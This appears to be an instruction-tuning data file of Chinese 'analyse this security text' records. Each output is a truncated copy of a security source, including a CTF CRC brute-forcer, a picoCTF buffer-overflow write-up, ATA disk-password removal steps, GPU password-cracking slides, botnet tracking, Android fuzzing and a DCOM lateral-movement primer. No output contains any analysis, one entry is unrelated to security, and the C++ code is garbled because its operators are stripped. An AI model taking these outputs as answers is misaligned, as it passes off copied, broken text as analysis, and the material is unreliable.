{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#include <cstdio> #include <cstdint> #include <map> using namespace std; char s[] = \" .::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::. \"; uint64_t poly = 0xC96C5795D7870F42; uint64_t table[256]; void generate_table() { for(int i=0; i<256; ++i) { uint64_t crc = i; for(unsigned int j=0; j<8; ++j) { // is current coefficient set? if(crc & 1) { // yes, then assume it gets zero'd (by implied x64 coefficient of dividend) crc >>= 1; // and add rest of the divisor crc = poly; } else { // no? then move to next coefficient crc >>= 1; } } table[i] = crc; } } uint64_t calculate_crc(uint8_t* stream, unsigned int n, uint64_t crc) { for(unsigned int i=0; i<n; ++i) { uint8_t index = stream[i]  crc; uint64_t lookup = table[index]; crc >>= 8; crc = lookup; } return crc; } char buf1[100]; char buf2[100]; uint64_t crc; map<int, map<int, char>> hints = { }; char charset[] = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\"; #include <string.h> int main() { generate_table(); FILE* f = fopen(\"FLAGZ.DAT\", \"rb\"); for (int row=0; row<65; row++) { fread(buf2, 80, 1, f); fread(&crc, 8, 1, f); if (row < 53) continue; if (row == 53) { strcpy(buf1, \": :\"); continue; } for (int i=0; i<80; i++) { buf1[i] = buf2[i]; } for (auto& hint: hints[row]) { buf1[hint.first] = hint.second; } int found = 0; int cnt=0; #define BRU1() for (int i=iprev; i<80 && !found; i++) for(int j=32; j<128; j++) { int old=buf1[i]; buf1[i] = j; int iprev = i; #define BRU() for (int i=iprev+1; i<=76 && !found; i++) for(char* p = charset; *p; p++) { int old=buf1[i]; buf1[i] = *p; int iprev = i; #define BRE() buf1[i] = old; } E0: int iprev = 0; BRU1() uint64_t c = calculate_crc((uint8_t*)buf1, 80, 0); if (c == crc) { found = true; cnt = 1; goto E1; } BRE() E1: if (!found) { printf(\"Help! (row %d)\\n\", row); printf(\"%s\\n\", buf1); for (int i=0; i<80; i++){ printf(\"%d\", i/10); } printf(\"\\n\"); for (int i=0; i<80; i++){ printf(\"%d\", i%10); } printf(\"\\n\"); int col; char bu[10]; scanf(\"%d %s\",", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n从BSRC看互联网企业安全漏洞及 威胁趋势 百度安全应急响应中心 Baidu Security Response Center 百度安全应急响应中心 Baidu Security Response Center 目录  互联网企业漏洞分布  漏洞趋势  趋势分析  未来的关注点 百度安全应急响应中心 Baidu Security Response Center 互联网企业漏洞分布  安全设计缺陷逻辑漏洞20%  XSS 18%  信息泄露 12%  越权 25%  其他 25% 百度安全应急响应中心 Baidu Security Response Center 逻辑漏洞业务强相关性漏洞 通常是对业务的威胁而非对资产的威胁 产品在设计实现阶段没有考虑到的问题 比如帐号操作支付逻辑 百度安全应急响应中心 Baidu Security Response Center 越权未授权访问 水平垂直权限跨越 接口页面的未授权访问 信息泄露 百度安全应急响应中心 Baidu Security Response Center 信息泄露  云存储AWS S3  代码托管github  文档博客 百度安全应急响应中心 Baidu Security Response Center 漏洞趋势 传统高危漏洞占比小但仍然存在 难以自动化发现的问题威胁凸显 百度安全应急响应中心 Baidu Security Response Center 技术因素  传统漏洞自动化检测方案成熟  开源商业自研产品成本低  现代web开发框架安全性提升  开发者安全意识提升 百度安全应急响应中心 Baidu Security Response Center 黑产  薅羊毛关注各类营销活动  虚假刷量刷单作弊欺骗平台获取收益  窃取用户隐私用于诈骗  流量劫持运营商劫持投放广告捆绑恶意软件  诈骗骗取用户钱财各类帐号信息 百度安全应急响应中心 Baidu Security Response Center 挖漏洞的方式 权衡时间与收益  自动化更深的路径更广的范围  深入业务边缘业务深挖业务逻辑  新思路奇技淫巧 坚持一定的时间投入 百度安全应急响应中心 Baidu Security Response Center 互联网企业关注什么 资产 法规 数据隐私一个SQL注入多少分 声誉 百度安全应急响应中心 Baidu Security Response Center 未来的关注点  API  业务逻辑漏洞  黑产情报  新基础环境容器化云化 百度安全应急响应中心 Baidu Security Response Center API 泄露用户隐私执行敏感操作 被上下游系统滥用 无人维护 百度安全应急响应中心 Baidu Security Response Center 业务逻辑漏洞 结合相关业务特征 内容建模识别 百度安全应急响应中心 Baidu Security Response Center 黑产情报 能获取到的往往只是用户反馈的现象线索 难收到确切可靠的高价值情报 百度安全应急响应中心 Baidu Security Response Center 容器化 容器化dockerkubernates自研COS  漏洞定位  安全隔离  安全能力滞后 百度安全应急响应中心 Baidu Security Response Center 云化 没有自有IDC 依赖外部安全产品 原有安全基础设施需迁移适配 系统边界模糊 百度安全应急响应中心 Baidu Security Response Center 谢谢", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# buffer overflow 1 Binary Exploitation, 200 points ## Description: > Can you authenticate to this service and get the flag? Connect with nc 2018shell3.picoctf.com 57659. ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> int flag() { char flag[48]; FILE *file; file = fopen(\"flag.txt\", \"r\"); if (file == NULL) { printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\"); exit(0); } fgets(flag, sizeof(flag), file); printf(\"%s\", flag); return 0; } int main(int argc, char **argv){ setvbuf(stdout, NULL, _IONBF, 0); // Set the gid to the effective gid gid_t gid = getegid(); setresgid(gid, gid, gid); // real pw: FILE *file; char password[64]; char name[256]; char password_input[64]; memset(password, 0, sizeof(password)); memset(name, 0, sizeof(name)); memset(password_input, 0, sizeof(password_input)); printf(\"What is your name?\\n\"); fgets(name, sizeof(name), stdin); char *end = strchr(name, '\\n'); if (end != NULL) { *end = '\\x00'; } strcat(name, \",\\nPlease Enter the Password.\"); file = fopen(\"password.txt\", \"r\"); if (file == NULL) { printf(\"Password File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\"); exit(0); } fgets(password, sizeof(password), file); printf(\"Hello \"); puts(name); fgets(password_input, sizeof(password_input), stdin); password_input[sizeof(password_input)] = '\\x00'; if (!strcmp(password_input, password)) { flag(); } else { printf(\"Incorrect Password!\\n\"); } return 0; } ``` ## Solution: This program reads a name from the user into a buffer of 256 bytes, followed by a password read from a file into another local buffer. It then reads a password from the user, and if the user password matches the correct password - outputs the flag. According to the name of the challenge, we need to leak the correct password. Let's inspect the code part after part. The first part reads the", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n數位鑑識與資料救援前瞻性研究 主講人: thx (張道弘) 1 什麼是數位鑑識? 數位鑑識也稱為電腦鑑識是一門有效解 決資通安全與電腦犯罪難題的科學 其定義為以一定程序保存識別抽 取記載及解讀電腦或網路媒體 ... 數位鑑識以及偵查的方式在案件的偵 查透過軟體並有流程拿取一些儲存於 儲存裝置可有助於案情釐清以及曝光 2 司法單位所用的儲存媒體鑑識技術 使用EncaseWinhexR-Studio FTK imager ,Helix Live CD純軟體 做邏輯區分析處理 資料讀取出來,純做數值運算,撈取資料 如果是主流 File System 現行商用軟體已 非常成熟.技術公開透明 3 數位鑑識技術生活化應用 此外以下狀況也會運用到數位鑑識技術 但是要注意法律: 無故以不正方法侵犯他人隱私 知悉之他人秘密即為妨害秘密罪 徵信社 商業或特務間諜 公司管理人員查詢使用者電腦行為 家長調查查詢家庭小孩電腦行為 4 數位鑑識法理性流程 由於數位證據容易被修改,因此若要做為法 律證物,要有一定流程,校驗程序以保障證物 沒被修改. 在設計數位鑑識軟體上因此需加入 1.專案管理. 2.對每次數位證據操作有記錄 3.對主數位證物檔有HASH記錄.以確保數位 證據沒被修改. 5 基層的警員以及偵查隊需要做更高技術層次 數位鑑識須透過專門的偵查部門才有設備 跟研究人員才能進行取證會嚴重影響到辦 案進度及只有重大案件才能用上這些技術. 實際上 如果瞭解底層技術透過了解其原 理以及運作模式的情況下可以用普通的設 備或軟體達到接近專業效果 困難度高的數位鑑識 6 高難度鑑識 :ATA 加密與解密 加密為 ATA 規範的一部分用於保護硬碟資料ATA 密碼 長度為 32 位元包括User Password 和 Master Password Master Password 僅用於解除 User Password 而並不會鎖住 硬碟 ATA 密碼的設置是由 ATA Protocol \"Security SetPassword\" 指令組完成的執行 Security Set Password 指令後在硬碟下 次重新啟動後密碼就會生效 ATA Password 存在電路版上外也記錄在碟片模組上 (在碟片上的故軔體+參數通稱為模組). 因此更換電路版無法解密 ATA 密碼保護的硬碟初始化 ATA 待命訊號正常,但僅回應有限 的 ATA 指令如設備識別型號指令序號識別指令等等但不 允許讀取硬碟上的資料 7 ATA 加密與解密 用戶如何判斷硬碟被設定 ATA 加密 1.硬碟在BIOS中可以正確識別包括型號序列號LBA 等 等 2.所有的扇區都不可讀取發生 ABRT 錯誤 3. BIOS 可能會提示要求輸入密碼或者直接給出硬碟被密碼保護 的訊息當使用系統安裝碟或者 DOS 啟動碟讀取硬碟時會停 止並提示 錯誤訊息如 Xbox 1 一代的 8 GB Seagate 硬碟就 啟用 ATA 加密在一般電腦上必須解密才可使用 8 解開 ATA 加密硬體設備 使用昂貴幾十萬的設備處理如 ACELab PC3000 UDMA Acelab 由俄國Таганрогского 無線電工程學院 ТРТИ 教授於1991成立為最早逆向工程硬碟指令公司 並推出各種Data Recovery領域套裝設備 9 可以一般軟體解開 未知ATA 加密 一. 需要能直接發送ATA Command .HBA 需要關掉AHCI 模式.建議最好用IDE 硬碟介 面控制卡. 二.軟體使用Victoria for windows+MHDD in dos可直接發送ATA Command 指令 10 在MHDD下 顯示 硬碟已 被加密 解開 ATA 加密 11 執行如圖ATA Command 指令集 產生出 21.bin 及 22.bin 兩個檔案此為硬 碟模塊檔 解開 ATA 加密 12 解開 ATA 加密 用 UltraEdit 打開22.bin 13 一密碼起始位置可能不同但排列與長度 是相似. 二0x137 偏移位置 07指出 ATA 加密等級 三紅色區域為User Password使用者密碼 四綠色區域為Master Password主密碼 五選擇紅色+綠色區域並另存檔案. 六執行 Victoria in Windows 解開 ATA 加密 14 必需以PIO方式連接硬碟 解開 ATA 加密 15 右下F按下去導入密碼檔 解開 ATA 加密 16 成功解除ATA Password 解開 ATA 加密 17 原理:28 bit ATA Command Set 18 數據恢復資料數據導引 . 對於不良讀取的硬碟 通常需要專業的數據導出設備才能達到 主要概念為 跳過不可讀出的區域. 有下面幾種方法. 1.ATA H", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 黑词黑话整理 ## 关键词 ### 种子关键词 种子关键词用于模型分类时的初始应用后续需要结合人工判断的方式优化种子关键词对种子关键词进行迭代 对于种子关键词设定的原则需要为[5] - 种子关键词的数量应该足够少 - 不同类别之间的种子关键词相似性很低 - 对于该类别种子关键词非常具有代表性 - 考虑到分词的不确定种子关键词不一定是一个词语也可以是短语形式 ```json { \"gamble\": [\"财神\", \"娱乐\", \"发牌\", \"bet\", \"bet365\", \"中奖\", \"开奖\", \"发财\", \"投注\", \"澳门\", \"赢球\", \"博彩\", \"体育\", \"葡京\", \"彩票\", \"电玩\", \"棋牌\", \"太阳城\", \"赌\", \"冰球\", \"金花\", \"赌场\", \"赌注\", \"赌城\", \"太阳城\", \"赌博\", \"彩金\"], \"yellow\": [\"约会\", \"亚洲\", \"牲交\", \"av\", \"欧美\", \"长腿\", \"肛交\", \"三级\", \"成人\", \"看片\", \"丝袜\", \"足浴\", \"偷拍\", \"调教\", \"骚\", \"阴毛\", \"无码\", \"臀\", \"屁股\", \"性爱\", \"情欲\", \"巨乳\", \"吹箫\", \"美乳\", \"开档\", \"高潮\", \"熟女\", \"操\", \"啪啪\", \"偷情\", \"做爱\", \"出轨\", \"性\", \"少妇\", \"肥臀\"], \"drug\": [\"毒品\", \"兴奋剂\", \"摇头丸\", \"贩毒\", \"可卡因\", \"吗啡\", \"鸦片\", \"白粉\", \"镇静剂\", \"罂粟\", \"drug\", \"吸毒者\", \"海洛因\", \"大麻\", \"冰毒\"], \"gun\": [\"枪\", \"步枪\", \"狙击\", \"步枪\", \"汽怆\", \"气枪\", \"狙击枪\"], \"personal_info\": [\"查通话记录\", \"查微信记录\", \"聊天记录\", \"短信内容\"], \"fraud\": [\"股票\", \"理财\", \"算命\", \"贵金属\", \"贷款\", \"集资\"], \"get_code\": [\"验证码\", \"短信\"], \"account\": [\"回收\", \"买卖\", \"共享\", \"账号\", \"王者\", \"荣耀\", \"地下城\", \"勇士\", \"白号\", \"外国号\", \"站街号\", \"瓶子号\", \"成品号\"], \"hack\": [\"黑客\"], \"cdn\": [\"分发\", \"cdn\"], \"idc\": [\"idc\"], \"score\": [\"跑分\"], \"card\": [\"发卡\", \"发卡网\", \"发卡平台\", \"卡密\"], \"empty_package\": [\"空包\", \"物流\", \"代发\", \"快递\", \"单号\", \"刷单\", \"发货\", \"底单\", \"空包网\"], \"online_money\": [\"兼职\", \"在家\", \"打字\", \"赚钱\", \"网赚\"], \"game_private_server\": [\"私服\", \"稀有\", \"游戏\"], \"government\": [\"人民\", \"国情\", \"政府\", \"政务\", \"制度\", \"国家\", \"政策\", \"机关\", \"减税\"], \"payment_platform\": [\"第三方\", \"第四方\", \"四方\", \"聚合\", \"支付宝扫码H5\", \"微信扫码H5\", \"银联扫码\", \"快捷支付\", \"接口\"], \"fake_id\": [\"文凭\", \"学位证\", \"学历\", \"毕业证\", \"证书\"], \"card_pool\": [\"猫池\", \"池\"], \"personal_info\": [\"查通话记录\", \"查微信记录\", \"聊天记录\", \"短信内容\"], \"hijack_traffice\": [\"网吧\", \"增值\", \"TR\"], \"pyramid_sale\": [\"返佣\"], \"e_commerce\":[\"羊毛\", \"吃货\"], } ``` ### 黑话关键词 这是涵盖更广的归类包括黑灰产行业里的一些敏感词关键词缩写等用于粗粒度地检测文本数据中的关键词命中情况 ```json { \"account\": [\"信封\", \"信封号\", \"取信\", \"洗信\", \"二手信\"], \"fraud\": [\"金主\", \"菜商\", \"卡农\", \"话务员\", \"话术本\"], \"click_fraud\": [\"外宣\", \"肥羊\", \"主持\", \"老师\", \"干饭\", \"稀饭\"], \"sex_fraud\": [\"色粉\", \"站街\", \"号商\", \"键盘手\", \"养火花\", \"机房\", \"散键盘\", \"出台\", \"楼凤\", \"做局\"], \"draug_fraud\": [\"马\", \"抓马\", \"垫蓝\"], \"laundering\": [\"水房\", \"声佬\", \"刷机佬\", \"接数佬\", \"卡佬\", \"车", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAchieve More. SanDisk Confidential 1 June 23, 2011 Economics of Password Cracking in the GPU Era 8/3/2011 Robert Imhoff- Dousharm SanDisk Confidential 2 2 June 23, 2011 Overview Introduction GPU Cracking Economics Deployment Explained Lessons Learned Conclusion Q/A SanDisk Confidential 3 3 June 23, 2011 Shameless Plugs Atheros Communications  Initial research time and funds SanDisk Corporation  Continued time and funds People of earth  Acting Human Electricity  Provides the path of least resistance Vegas 2.0  dc949  CuckooNest SanDisk Confidential 4 4 June 23, 2011 About me Research and technical  IT Security  4 years Credit card security (see DEF CON 11-13)  3 years code IDPS research  2 years GPGPU password cracking Suit and Tie  12 years working experience with IT Security  Developer  Researcher  SOC Analyst  Response  Tactical  Holistic Private Hack Space  We have trees and servers to muse over SanDisk Confidential 5 5 June 23, 2011 Overview: Introduction SanDisk Confidential 6 6 June 23, 2011 Introduction What is General Computing?  GPU vs SSEx vs. HPC  CUDA and OpenCL (not GL)  What is the current state of GC and HPC?  Top500 Cloud Computing  Amazon AWC / EC2  Nimbix  Peer1 Hosting  Penguin Computing SanDisk Confidential 7 7 June 23, 2011 Introduction Distributed Technologies  distributed.net  Folding@home  SETI@home  BitCoin SanDisk Confidential 8 8 June 23, 2011 Overview: GPU Cracking SanDisk Confidential 9 9 June 23, 2011 GPU Cracking  Hardware NVidia vs. ATI  GTX 590  1024 Cores * 8 Cell = 8,192 streams  Radeon HD5870  1,600 Cores == 1,600 Streams CUDA vs. Stream vs. OpenCL  CUDA == R.A.D  Stream == Piss poor documents  OpenCL == Wave of future (sorry CUDA) SanDisk Confidential 10 10 June 23, 2011 GPU Cracking  Software Current offerings  oclHashCat  igHash  CUDA-Multiforcer (M.I.A) Current Benchmarks  NTLM (Windows AD)  MD5 (Websites)  Salt based passwords (Smart) SanDisk Confidential 11 11 June 23, 2011 GPU Cracking  Software Whats in a mask?  Character ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n$ whoami b1t<master@zomeye.org> GitHub/Twitter @zom3y3 #Pentest #C #Antivirus #Python #Botnet #DDoS TO BE A MALWARE HUNTER! Attention ! 以下言论仅代表个人观点,与任何组织和其他个人没有任何关系 本议题数据纯属虚构,如有雷同纯属巧合 Outline  为什么研究僵尸网络?  僵尸网络识别监控技术分享  Silver Lords黑客组织追踪分析 为什么研究僵尸网络  解决思路封IP+杀进程 从哪里开始  2014年底当我在阿里云每天需要解决30个恶意主机工单的时候 怎么解决 ACM(恶意软件追踪系统) F2M H2M S2M 自主杀毒软件设计(FindMalware) 进程检测 流量检测 恶意主机项目 恶意进程 恶意IP FindMalware 简介: FindMalware是一款用C/C++语言编写覆盖Windows和Linux平台的恶意软件追踪 工具其以PEELF 代码段哈希值作为静态特征检测恶意软件并获取进程socket通信 提取恶意软件CNC除此之外它也集成了信息采集器功能能够采集主机文件进程网 络等信息并配合云端数据分析平台进行高级威胁检测 项目地址https://github.com/zom3y3/findmalware  ELF  PE 可执行文件 进程模块 父进程 进程检测  socket 进程通信 文件信息 进程信息 网络信息 信息采集  信息上报 威胁源监控 人肉添加 漏报机制 VT等平台 网络爬虫 ClamAV 病毒库 病毒特征库 基本行为 进程通信 病毒识别 提取CNC TCP/UDP 进程通信 文件hash追踪 网络流量追踪 PoC追踪 信息追踪  410万自主病毒库  集成多款AV  30秒/台  9个月  50个中控/天  病毒检出率95%  XX重大案件 Now ! 僵尸网络威胁情报项目规划 情报搜集平台 分布式蜜罐 系统 情报订阅系 统 情报分析平台 C&C自动 化监控系统 僵尸网络关 联分析系统 情报分 发平台 僵尸网络威 胁情报平台 Honeypot 蜜罐系统是作为 情报搜集平台一 个主要部分其 主要目的是搜集 主流的PoC恶 意软件样本恶 意下载源等 利用MHN进行分布式蜜罐部署 利用MHN进行分布式蜜罐部署 利用MHN进行分布式蜜罐部署 CNC Command Tracking CNC监控系统是 作为情报分析平 台一个主要部分 其主要目的是逆 向分析主流僵尸 网络通信协议 并监控其攻击指 令 https://github.com/ValdikSS/billgates-botnet-tracker 挑选Linux/Setag.B.Gen样本80d0cac0cd6be8010819fdcd7ac4af46 作为本次测试对象 挑选Linux/Setag.B.Gen样本80d0cac0cd6be8010819fdcd7ac4af46 作为本次测试对象  C&C提取  C&C探活  C&C分类  C&C通信协议解密  C&C监控  C&C提取  C&C探活  C&C分类  C&C通信协议解密  C&C监控  C&C提取  C&C探活  C&C分类  C&C通信协议解密  C&C监控 利用Splunk进行简单的数据分析 利用Splunk进行简单的数据分析 利用Splunk进行简单的数据分析 利用Splunk进行简单的数据分析 SmartQQ Group Message Tracking SmartQQ在线WebQQ网页 平台,是腾讯在WebOS云平 台上推出的一款单纯的聊 天工具通过逆向分析 SmartQQ通信协议可以 实现QQ群上的黑产监控 项目地址https://github.com/zom3y3/QQSpider Silver Lords 2014年12月31号,我 通过分析一个ftpBrute 恶意代码追踪到一个巴 西黑客组织Silver Lords,并通过xss漏洞 进入Silver Lords 黑 产平台. 主要成员: Al3xG0 Argus Ankhman Flythiago nulld  AWLOOKWINSIDEWTHEWBRAZILIANWUNDERGROUND  近3 W FTP 站点  70 个政府系统  N个NASA站点  1000+ Cpanel  7000+ c99shell  62WWCPF巴西税卡 Silver Lords组织分析 SilverWLords ftpBrute painel.cyberunder.org/painel.p hp 客户端:FtpBrute.pl cPanle painel.cyberunder.org/c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDROID-FF  THE ANDROID FUZZING FRAMEWORK TWITTER : @ANTOJOSEP007 GITHUB : @ANTOJOSEPH @WHOAMI  security engineer @ intel  android security enthusiast  speaker / trainer @ Hitb Amsterdam, brucon / hackinparis / blackhat / nullcon / ground zero / c0c0n   when not hacking , you can see me travelling / djing / biking DROID-FF : WHY ?  attempts to solve fuzzing in mobile devices (* android )  challenges in fuzzing :  data  generation  low powered devices  crash logging  crash triage  exploitable or not ? DROID-FF : APPROACH  scripts written in python  integrates with peach / pyzuff / radamsa  custom crash logging  custom crash triaging  exploitable checks via gdb plugin J  Fully automated DROID-FF : DATA GENERATION  two approaches  dump fuzzing using radamsa / pyzuff  generation based fuzzing using peach  to counter checksums / magic numbers , custom fixers are added (for eg : dex repair for fixing checksums in randomly mutated dex files (credits : github.com/anestisb )  Grammar specified in pit files for peach DROID-FF : FUZZING CAMPAIGN  Runs the generated files against the target binary ( for eg : /system/xbin/dexdump crash1.dex )  Makes use of adb_android python module to push generated files to device  Makes use of adb shell command to execute the file against the target binary  Adds a custom log to the android logcat so that we can track any files responsible for the crash ( for eg : log -p F -t CRASH_LOGGER SIGSEGV : filename.dex ) DROID-FF : BUILDING ANDROID MODULES  Navigate to the module directory ( eg : /frameworks/av/cmd/stagefright/)  Use the make helper  source build/envsetup.sh  edit (/frameworks/av/cmd/stagefright/Android.mk) and LOCAL_MODULE =$BUILD_EXECUTABLE  mma ( /out/target/product/generic/system/xbin/dexdump) DROID-FF : PROCESSING THE LOGS  Pulls the adb logcat data from the device by saving it to a file and adb pull  Parse the log file and look for crashes (\"SIGSEGV\", \"SIGSEGV\", \"SIGFPE\",\"SIGILL)  If a crash is found , go up the lines until you fin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 消息队列 <!-- GFM-TOC --> * [消息队列](#消息队列) * [一消息模型](#一消息模型) * [点对点](#点对点) * [发布/订阅](#发布订阅) * [二使用场景](#二使用场景) * [异步处理](#异步处理) * [流量削锋](#流量削锋) * [应用解耦](#应用解耦) * [三可靠性](#三可靠性) * [发送端的可靠性](#发送端的可靠性) * [接收端的可靠性](#接收端的可靠性) * [参考资料](#参考资料) <!-- GFM-TOC --> ## 一消息模型 ### 点对点 消息生产者向消息队列中发送了一个消息之后只能被一个消费者消费一次 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/image-20191212011250613.png\"/> </div><br> ### 发布/订阅 消息生产者向频道发送一个消息之后多个消费者可以从该频道订阅到这条消息并消费 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/image-20191212011410374.png\"/> </div><br> 发布与订阅模式和观察者模式有以下不同 - 观察者模式中观察者和主题都知道对方的存在而在发布与订阅模式中生产者与消费者不知道对方的存在它们之间通过频道进行通信 - 观察者模式是同步的当事件触发时主题会调用观察者的方法然后等待方法返回而发布与订阅模式是异步的生产者向频道发送一个消息之后就不需要关心消费者何时去订阅这个消息可以立即返回 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/image-20191212011747967.png\"/> </div><br> ## 二使用场景 ### 异步处理 发送者将消息发送给消息队列之后不需要同步等待消息接收者处理完毕而是立即返回进行其它操作消息接收者从消息队列中订阅消息之后异步处理 例如在注册流程中通常需要发送验证邮件来确保注册用户身份的合法性可以使用消息队列使发送验证邮件的操作异步处理用户在填写完注册信息之后就可以完成注册而将发送验证邮件这一消息发送到消息队列中 只有在业务流程允许异步处理的情况下才能这么做例如上面的注册流程中如果要求用户对验证邮件进行点击之后才能完成注册的话就不能再使用消息队列 ### 流量削锋 在高并发的场景下如果短时间有大量的请求到达会压垮服务器 可以将请求发送到消息队列中服务器按照其处理能力从消息队列中订阅消息进行处理 ### 应用解耦 如果模块之间不直接进行调用模块之间耦合度就会很低那么修改一个模块或者新增一个模块对其它模块的影响会很小从而实现可扩展性 通过使用消息队列一个模块只需要向消息队列中发送消息其它模块可以选择性地从消息队列中订阅消息从而完成调用 ## 三可靠性 ### 发送端的可靠性 发送端完成操作后一定能将消息成功发送到消息队列中 实现方法在本地数据库建一张消息表将消息数据与业务数据保存在同一数据库实例里这样就可以利用本地数据库的事务机制事务提交成功后将消息表中的消息转移到消息队列中若转移消息成功则删除消息表中的数据否则继续重传 ### 接收端的可靠性 接收端能够从消息队列成功消费一次消息 两种实现方法 - 保证接收端处理消息的业务逻辑具有幂等性只要具有幂等性那么消费多少次消息最后处理的结果都是一样的 - 保证消息具有唯一编号并使用一张日志表来记录已经消费的消息编号 ## 参考资料 - [Observer vs Pub-Sub](http://developers-club.com/posts/270339/) - [消息队列中点对点与发布订阅区别](https://blog.csdn.net/lizhitao/article/details/47723105)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n安卓APP在各种场景下的调试总结 前言 做此项工作的原因在于笔者之前在CTF比赛中遇到Android逆向类型的题目时因为只有一个安卓手机作 为主力机出于安全考虑以及手机厂商限制通常很难获得root权限再比如使用模拟器则通常面临x86 环境下调试arm native模块的困难常常因为调试问题困扰很久于是下定决心折腾一番希望能对各 位在各种不同限制条件下能够对安卓APP进行调试有所帮助其中难免遗漏或错误之处也欢迎各位师傅 指正 如何动态运行待调试的APP 想要调试一个安卓APP首先最基本的就是要具备一个可以将其动态运行起来的环境这个环境整体上 可以分为模拟器环境和真机环境 模拟器 模拟器方面大致是有三种不同的选择可以在不同条件下选择合适的 基于VirtualBox的安卓模拟器以逍遥夜神等为代表的市场上最常见的一类模拟器核心是基于 VirtualBox的x86虚拟机在虚拟机中安装安卓操作系统 优点1.可以使用硬件虚拟化技术加速 2.模拟整个操作系统提供了极为完整的软件运行环 境软件兼容性较强 缺点1.该类模拟器虚拟机中通常安装x86平台的安卓系统在运行只含有arm平台native库 的APP时可能会出现问题可以尽量选择安卓9.0或11.0及以上版本的该类模拟器其中新增 的指令翻译技术可以让x86平台模拟运行arm指令此外使用IDA pro对native层模块进行调 试时会报错即arm native层模块在此环境下能运行但是不能调试具体可能是由于指令转译 机制的存在导致 BlueStacks为代表的基于API翻译技术的原理是把Android底层API接口翻译成Windows API 优点1.因为采用API翻译其运行效率高且对PC硬件本身没有硬件虚拟化要求在硬件兼 容性方面有一定的优势 缺点1.Bluestacks需要翻译的Android接口数量巨大很难面面俱到软件兼容性方面欠佳 2.该类模拟器同样通常支持x86平台的安卓系统在运行只含有arm平台native库的APP时可 能会出现问题可以选择4.0及以上版本的Bluestacks模拟器Bluestacks也具有指令翻译技 术可以让x86平台模拟运行arm指令此外使用IDA pro对native层模块进行调试时也会报 错即arm native层模块在此环境下能运行但是不能调试具体可能是由于指令转译机制的存 在导致 Android Virtual DeviceAndroid Studio中的模拟器组件 优点1.可以选择模拟原生arm架构的安卓系统软件兼容性最好能够使用ida调试arm native层模块 缺点1.基于qemu模拟器进行arm安卓系统存在巨大的指令翻译开销速度很慢 Android Studio的安装包比较大其实AVD组件是可以单独安装的这里给出一个关于AVD安 装使用的小技巧,即使用官方的command-tools手动安装配置模拟器组件 安卓真机 使用真机环境是最佳选择但是不便之处在于 通常主力机为了安全考虑都不会进行root或者因为目前手机厂商限制无法root 调试机一般本身就是淘汰的旧手机再者如果只用来调试比如电池长时间忘记充电可能寿命很快 就会结束 具备root权限的真机环境当然是最完美的调试环境了本文后续主要讨论无root环境下的真机环境 比较 通过以上对比笔者在调试APP时通常首先考虑是否要进行native层且是arm架构的native模块的调试 如果不需要则使用一般的安卓模拟器就可以方便的调试如果需要那么通常考虑真机调试或使用AVD模 拟arm安卓系统调试 如何获取APP的调试权限 安卓系统中想要调试APP的一个条件是APP是可调试的即AndroidManifest.xml中的 android:debuggable=true而通常的APP release版本通常都是取消这个属性的那么这种情况该如何 解决呢 //使用命令行配置安装模拟器 //列出所有可安装软件包 sdkmanager --list //安装几个必须的组件 sdkmanager emulator sdkmanager platform-tools sdkmanager extras;google;Android_Emulator_Hypervisor_Driver //硬件加速驱动 sdkmanager platforms;android-31 //这个是最新的SDK不然模拟器运行不起来 //选择一个安卓镜像笔者测试安卓7.1.1版本是可用的 sdkmanager system-images;android-25;google_apis;arm //创建一个device avdmanager create avd -n avd -k \"system-images;android- 25;google", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nT1175: Lateral Movement via DCOM 查看mitre ATT&CK 的描述已经不推荐使用该技术推荐使用Remote Services: Distributed Component Object Model和Inter-Process Communication: Component Object Model 参考 The Component Object Model LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM 域渗透利用DCOM在远程系统执行程序 组件对象模型 什么是DCOM Distributed Component Object Model 分布式组件模型,先说下COM Component Object Model 组件对象模型 COM componentCOM组件是微软公司为了计算机工业的软件生产更加符合人类的行为方式 开发的一种新的软件开发技术百科 The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents), ActiveX (Internet- enabled components), as well as others.MSDN 简要的描述下COM COM 不是一种面向对象的语言而是一种标准和编程语言或OS无关 COM对语言的唯一要求代码在能够创造指针结构的语言中生成并且能够通过指针显式或隐式 的调用函数 COM 主要的两个内容对象和接口 每个对象和接口都关联一个128位的GUID全局唯一标识符称为类CLSID类标识符用于 标识唯一的COM对象 COM 类在操作系统中注册的位于注册表中 HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID DCOM是什么 RPC+COM == DCOM ,DCOM允许COM组件利用网络来传输数据 